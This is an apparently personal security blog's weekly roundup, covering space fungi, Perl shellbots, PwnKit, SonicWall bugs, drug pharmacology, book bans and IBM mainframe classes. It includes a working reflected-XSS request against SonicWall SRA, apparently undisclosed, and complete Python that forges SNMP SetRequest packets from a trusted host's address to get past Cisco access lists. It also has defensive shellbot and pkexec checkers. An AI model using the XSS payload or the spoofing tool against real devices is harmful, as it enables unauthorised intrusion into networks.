The allegedly weekly roundup of notes – Jan 28th, 2022

Alright, we are back for a third week of this. Somehow. If I remember to post this. Shorter this week as I had a lot of work on, unfortunately. There are dozens of open tabs that I might even read next week and summarise here. Maybe.

I realised while posting last week's one that this is also a great way for me to finally close some tabs! Only 42069 browser tabs to go, on this laptop at least.

There should be some more regular pieces in the coming weeks – an amusing backdoor I developed that deserves a writeup, some exploit development stuff, etc.

Anyway, here is this week's roundup.

Using radiotrophic fungi as a “shield” from radiation in space?
So firstly, you have to come to terms with the fact that radiotrophic fungi are a thing that actually exist. That being, fungi that derive energy from ionising radiation. Kind of like the protomolecule in The Expanse, these little fuckers eat radiation to grow.

While most sensible scientists would just leave such cursed abominations the fuck alone, the mad bastards who wrote this paper figured we could make the little critters useful, by using them as a self replicating “shield” or “barrier” against radiation.

In space.

So they shipped off some of this stuff to the ISS and examined it over a period of time, finding out that yes, these little fungi will more than happily act as a shield against background radiation in space, and grow rather nicely.

The plan seems to be to use these fungi as self-growing shields of sorts if we ever make it to Mars, so our first colonists don’t just get wrecked by background radiation. Beats lugging giant lead shielding around, anyway.

Perl “shellbots” will never die.
So I came across this blog post, about a malware campaign targeting Gitlab CE instances that drops a Perl “shellbot”.

The bit in the blog post suggesting the authors of the malware are Portuguese, and that it has been around since at least 2015, gave me pause.

Perl “shellbots” of the my $pacotes = 1; strain (a string common to all of them) have been around since at least 2008 or so, and originate from Brazil. In recent years, though, everyone has mostly just… ignored them. So they are forgotten.

Now, I’m not bashing the author here. I’m pointing out that old, tired malware is still relevant even in modern times, over a decade later, and that we shouldn’t forget the old shit or think it’s irrelevant.

After all, even Conficker is still around 🙂
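As an added example (my own code, not from the post or the Gitlab campaign writeup it links), here is a small indicator scan for Perl shellbots of the family described above. The my $pacotes = 1; marker is the one the post names; the IRC-bot heuristics alongside it, the candidate install paths and the two sample scripts are my own assumptions about how these bots usually look, not something the post states.

```python
# Added example, not code from the original post or the linked writeup.
# Scans files for the "pacotes" family marker the post names plus a few
# assumed generic Perl-IRC-bot traits; the sample scripts are constructed.
import os
import re
import shutil
import tempfile

PACOTES_MARKER = re.compile(r"my\s+\$pacotes\s*=\s*1\s*;")

# Assumed generic traits of a Perl IRC bot (not from the post): a raw socket,
# IRC verbs on the wire, and the bot renaming its own process.
IRC_HEURISTICS = {
    "perl_socket": re.compile(r"IO::Socket::INET|\bsocket\s*\("),
    "irc_verbs": re.compile(r"\b(NICK|JOIN|PRIVMSG|USER)\b"),
    "proc_rename": re.compile(r"\$0\s*=\s*['\"]"),
}

def classify(text):
    """Return (verdict, matched indicator names) for one script's contents."""
    hits = []
    if PACOTES_MARKER.search(text):
        hits.append("pacotes_marker")
    hits += [name for name, rx in IRC_HEURISTICS.items() if rx.search(text)]
    if "pacotes_marker" in hits:
        verdict = "shellbot"      # the family marker alone is conclusive
    elif len(hits) >= 2:
        verdict = "suspicious"    # generic bot shape, worth a human look
    else:
        verdict = "clean"
    return verdict, hits

def scan_tree(root, max_bytes=1 << 20):
    """Walk root and classify every readable file.  The extension is ignored
    on purpose: these bots are routinely dropped as .txt or with none at all."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    text = fh.read(max_bytes).decode("latin-1")
            except OSError:
                continue
            verdict, hits = classify(text)
            if verdict != "clean":
                findings.append((path, verdict, hits))
    return findings

# Constructed samples (not real malware): the shape of a pacotes-style bot,
# and a benign Perl client that merely opens a socket.
SAMPLE_BOT = """#!/usr/bin/perl
my $pacotes = 1;
$0 = "/usr/sbin/httpd";
use IO::Socket::INET;
my $irc = IO::Socket::INET->new(PeerAddr => "irc.example", PeerPort => 6667);
print $irc "NICK bot\\r\\nUSER bot 8 * :bot\\r\\nJOIN #chan\\r\\n";
"""
SAMPLE_BENIGN = """#!/usr/bin/perl
use IO::Socket::INET;
my $s = IO::Socket::INET->new(PeerAddr => "mail.example", PeerPort => 25);
print $s "EHLO host\\r\\n";
"""

def scan_samples():
    """Write the two constructed samples to a scratch dir, scan it, clean up."""
    root = tempfile.mkdtemp()
    try:
        for name, body in (("bot.txt", SAMPLE_BOT), ("client.pl", SAMPLE_BENIGN)):
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        return [(os.path.basename(p), v, h) for p, v, h in scan_tree(root)]
    finally:
        shutil.rmtree(root)

if __name__ == "__main__":
    for name, verdict, hits in scan_samples():
        print(name, verdict, hits)
```

Point it at a web root or /tmp on a box you suspect; the marker match is the high-confidence signal, the heuristics only flag things for a second look.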

Sorry, SonicWall. (just an XSS this time).
Look, I have a theme going here, alright? I’ll probably not mention this vendor at all for the next month.
Anyways, while looking through some notes from investigating a SonicWall SRA SQL injection bug, I found this XSS that I had turned up along the way. Unsure if I ever disclosed it, so here you go. Have fun popping alert boxes.

GET /cgi-bin/supportInstaller?setiemode=true&URL=</a><script>alert(0)</script>

That is it, that is the bug: the URL parameter is reflected into the page without encoding, so closing the anchor tag and dropping in a script tag is all it takes. I can’t recall which exact versions are impacted, or if any feature needs enabling. Or if it’s patched.

Have fun.

Hacking Cisco networks using spoofed SNMP packets.
So you have the RW community string for a bunch of Cisco devices, but the cheeky bastards have put an SNMP access list on them so only a trusted host is allowed to make SNMP requests.

Lucky you, UDP spoofing is fast and easy: there is no handshake, so a packet carrying the trusted host’s address as its source sails straight through the access list. The catch is that the device’s reply also goes to the trusted host, so you are working blind and need a side effect to confirm a write landed. I’d been trying to dig up this blog post for ages, and after spelunking through archives, found it. Give that a read first.

NCC Group also have released a tool for this, which you can find here.
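To make the mechanics concrete, here is an added example of my own (not code from the original post, the linked blog post, or NCC Group’s tool). It hand-builds an SNMPv2c SetRequest in BER and wraps it in a raw IPv4/UDP packet whose source address is the host the device trusts. The addresses, the community string and the target object (sysContact.0, chosen as a harmless writable object) are constructed assumptions for the demo; actually sending needs CAP_NET_RAW and only happens under __main__.

```python
# Added example, not code from the original post or NCC Group's tool.
# Builds an SNMPv2c SetRequest by hand and sends it from a forged source
# address via a raw socket.  All addresses/community/OID below are assumed.
import socket
import struct

# ---- minimal BER (the ASN.1 subset SNMPv1/v2c uses) -----------------------

def ber_length(n):
    """Short form below 128, long form (0x80|N followed by N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, value):
    return bytes([tag]) + ber_length(len(value)) + value

def ber_integer(n):
    # Minimal two's complement; the +8 bits leave room for the sign bit.
    return tlv(0x02, n.to_bytes((n.bit_length() + 8) // 8, "big", signed=True))

def ber_octets(b):
    return tlv(0x04, b)

def ber_oid(dotted):
    parts = [int(p) for p in dotted.strip(".").split(".")]
    out = bytearray([40 * parts[0] + parts[1]])   # first two arcs share a byte
    for arc in parts[2:]:
        chunk = bytearray([arc & 0x7F])            # base-128, high bit = "more"
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return tlv(0x06, bytes(out))

def ber_sequence(*items):
    return tlv(0x30, b"".join(items))

def snmp_set_request(community, oid, value, request_id=0x1337):
    """SNMPv2c SetRequest (PDU tag 0xA3) carrying one OCTET STRING varbind."""
    varbind = ber_sequence(ber_oid(oid), ber_octets(value))
    pdu = tlv(0xA3, ber_integer(request_id) + ber_integer(0) + ber_integer(0)
              + ber_sequence(varbind))
    return ber_sequence(ber_integer(1),            # version 1 == v2c
                        ber_octets(community.encode()), pdu)

# ---- raw IPv4/UDP with a forged source address ----------------------------

def checksum(data):
    """RFC 1071 one's-complement sum; yields 0 over a correctly summed blob."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def ipv4_udp_packet(src_ip, dst_ip, src_port, dst_port, payload, ttl=64, ident=0x4242):
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    udp_len = 8 + len(payload)
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_UDP, udp_len)
    udp = struct.pack("!HHHH", src_port, dst_port, udp_len, 0) + payload
    udp_csum = checksum(pseudo + udp) or 0xFFFF    # a computed 0 is sent as 0xFFFF
    udp = udp[:6] + struct.pack("!H", udp_csum) + udp[8:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + udp_len, ident, 0,
                     ttl, socket.IPPROTO_UDP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + udp

def udp_checksum_ok(packet):
    """Re-verify the UDP checksum (pseudo-header + UDP) of a packet built above."""
    src, dst, udp = packet[12:16], packet[16:20], packet[20:]
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_UDP, len(udp))
    return checksum(pseudo + udp) == 0

def send_spoofed(packet, dst_ip):
    # IP_HDRINCL: we supply the IP header, so the kernel keeps our source address.
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    s.sendto(packet, (dst_ip, 0))
    s.close()

if __name__ == "__main__":
    # Constructed demo values: trusted NMS 10.0.0.5, target device 10.0.0.1.
    msg = snmp_set_request("private", "1.3.6.1.2.1.1.4.0", b"spoofed")
    pkt = ipv4_udp_packet("10.0.0.5", "10.0.0.1", 40000, 161, msg)
    send_spoofed(pkt, "10.0.0.1")
```

Two practical notes: the forged packet only reaches the device if nothing on the path does egress filtering or unicast reverse-path checks on the source address, and because the GetResponse goes back to the trusted host rather than to you, confirm the write through whatever it changes (here, read sysContact.0 back from a host that is allowed to query).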

Loperamide overdose is a thing, apparently, as a bootleg methadone replacement.
Sometimes you click on content that you suspect is going to be clickbait as fuck, but turns out to not only be decent, but also contains a bunch of references. This video by “chubbyemu” is exactly that.

With references and a surprisingly informative (albeit simplified for a general audience) breakdown of the pharmacology/medical stuff, this video taught me something new: that people sometimes abuse massive doses of loperamide, an over the counter anti-diarrhea medication, as kind of a bootleg methadone to deal with the symptoms of opiate withdrawal. Sometimes with fatal outcomes.

More casualties in the pointless war on drugs.

More pharmacology: NAC as a hangover cure?
In a past life as a complete pisshead, I spent a great deal of time and effort trying to find the perfect hangover cure.

Turns out, some scientists and grant writers are also heavy drinkers, and some research was done into the use of NAC (N-acetylcysteine) as a hangover cure. You can find the paper here.

They note that the method they used to get the subjects pissed wasn’t great, and that no real difference in how miserable the participants felt the next day was found between placebo and test groups. However, they did find that women responded more than men to NAC in terms of “feeling less miserable”. Further testing required.

Another study on NAC found that it helped prevent adverse impacts on zebrafish livers when exposed to ketamine. Given ketamine is often consumed alongside alcohol at festivals, there could be something useful there in terms of harm reduction or harm mitigation.

A number of ethanol enthusiasts on /r/drugnerds also reckon NAC helps prevent their hangovers, when taken as a prophylactic. It is noted though that it has to be taken before drinking, and taking it after one starts drinking can result in worse hangovers. Interesting.

Personally, I can advise the only way to 100% avoid a hangover is to lay off the sauce a bit, and drink more water.

I’ll probably do more reading on NAC in future, as while it’s currently the supplement of choice for anti-vaxxers, resulting in the FDA stepping in, I did come across a few abstracts mentioning it being useful for asthmatics or COPD sufferers, along with potential use cases in addiction treatment for nicotine or cocaine due to impacts on dopamine. It also appears to have some use in cases of schizophrenia or bipolar.

It is also interesting that it is used in clinical settings (in huge quantities) as a treatment for paracetamol (Tylenol for the yanks) overdose.

PolicyKit’s pkexec grants root shells trivially.
I love a good userland local privesc on Linux. Qualys reported on a trivially exploitable local root bug in pkexec (CVE-2021-4034, “PwnKit”), which effectively grants you instant root on most major Linux distributions. Turns out, the bug was written up in a blog post back in 2013, but was neither exploited nor fixed back then!

A whole bunch of exploits are in the wild now. The first was from bl4sty, to which I proposed a small modification, then an updated version from bl4sty, and now plenty more variants are out there.

The tweak I proposed isn’t anything special, it simply makes the exploit more self contained by using a pretty cursed little trick to give you an executable that is also a shared object. I’ve used this in other exploits, which I should get around to publishing at some point. One or two of the variants since have added this trickery.

Anyway, update your boxes. Or go root some 🙂
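The quick check a defender wants here is whether pkexec is still setuid-root, since that is the precondition the bug needs; Qualys’ interim mitigation while waiting for a package update is to strip that bit (chmod 0755 /usr/bin/pkexec). This is an added example of my own, not code from the post, the Qualys advisory or any of the exploits; the candidate install directories are an assumption.

```python
# Added example, not from the post or the Qualys advisory: report whether a
# host still has a setuid-root pkexec.  Install paths below are assumed.
import os
import stat

CANDIDATE_DIRS = ("/usr/bin", "/bin", "/usr/local/bin")

def mode_is_setuid(mode):
    """True when the setuid bit is set in a st_mode / octal mode value."""
    return bool(mode & stat.S_ISUID)

def setuid_state(path):
    """(has_setuid_bit, owner_uid, permission bits) for path; None if absent."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return mode_is_setuid(st.st_mode), st.st_uid, stat.S_IMODE(st.st_mode)

def is_setuid_root(path):
    state = setuid_state(path)
    return state is not None and state[0] and state[1] == 0

def find_setuid_pkexec(dirs=CANDIDATE_DIRS):
    """Every pkexec under dirs that is still setuid-root.  That alone does not
    prove it is unpatched, but a non-setuid pkexec cannot be used for this bug."""
    return [p for p in (os.path.join(d, "pkexec") for d in dirs) if is_setuid_root(p)]

def mitigation_for(path):
    """The interim fix Qualys published, to apply until the package is updated."""
    return "chmod 0755 %s" % path

if __name__ == "__main__":
    hits = find_setuid_pkexec()
    if not hits:
        print("no setuid-root pkexec found under", ", ".join(CANDIDATE_DIRS))
    for p in hits:
        print("%s is setuid-root (mode %o); interim mitigation: %s"
              % (p, setuid_state(p)[2], mitigation_for(p)))
```

Run it as any user; stat does not need root. Once the distro package is updated the binary goes back to setuid-root by design, so treat the chmod as a stopgap, not the fix.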

SonicWall remote SQL injection, again.
VX Underground announced that exploit code for CVE-2021-20028 has appeared online. Daniel Card has a rather useful thread ongoing about it.

I won’t say too much at this time as I don’t actually know how embargoed the details are, but it is extremely similar to CVE-2019-7481 – in fact, the exploit implements the older CVE as well as the new one.

It also implements a path traversal (post authentication) to leak config data from the device, and possibly another bug to do with config leaking involving an email, but I haven’t looked at that part yet.

Anyway, the exploit gives an attacker remote access via the VPN, and also (in many cases) Active Directory credentials for the network. Often for a privileged account. So it’s an incredibly short path from “remote, no auth” to “complete domain compromise”. No wonder ransomware groups are all over it.

I’ll publish a longer piece on the exploit code that was released once I feel it won’t be stepping on any toes. Patch your SonicWall devices, or just throw them out the window.

Book bans are back!
Across the US, for some absurd reason, books are being banned in schools. Here (warning, PDF) is a list of books that are being supposedly prohibited in schools in Texas.

It is not 100% clear to me if they are being immediately pulled from shelves, or what exactly is going on – if future acquisition is prohibited, if access to them will be monitored and controlled, or what.

Either way, banning books is fucking stupid. That is all.

IBM Mainframe Classes (online) and Learning Licences.
Came across this on the orange website. TL;DR: IBM has some free classes on mainframe programming and stuff that you can take. If you earn some silly badges for taking these classes, you qualify for a relatively inexpensive (in IBM terms, anyway) learner’s licence for IBM’s z/OS development and test environment, which runs on your PC.

I’d strongly suggest anyone with even the vaguest interest in hacking Big Iron go and avail of this. It is important to actually understand how to use a mainframe before you go hacking on one.

An interesting piece on gold mining from the Atavist.
Eventually, I’ll probably have read the entire back catalogue of the Atavist and recommended their stuff here. This piece, on some incredibly sketchy dealings around gold mining in Peru, how gold gets into the financial system, how it’s extracted, etc, is well worth the time to read.

As always with articles like this, I will say no more, as that would spoil the fun.

Finally, a photo of my cat.
I take so many photos of my cat that it seems a little daft to not include the best/most amusing one each week.
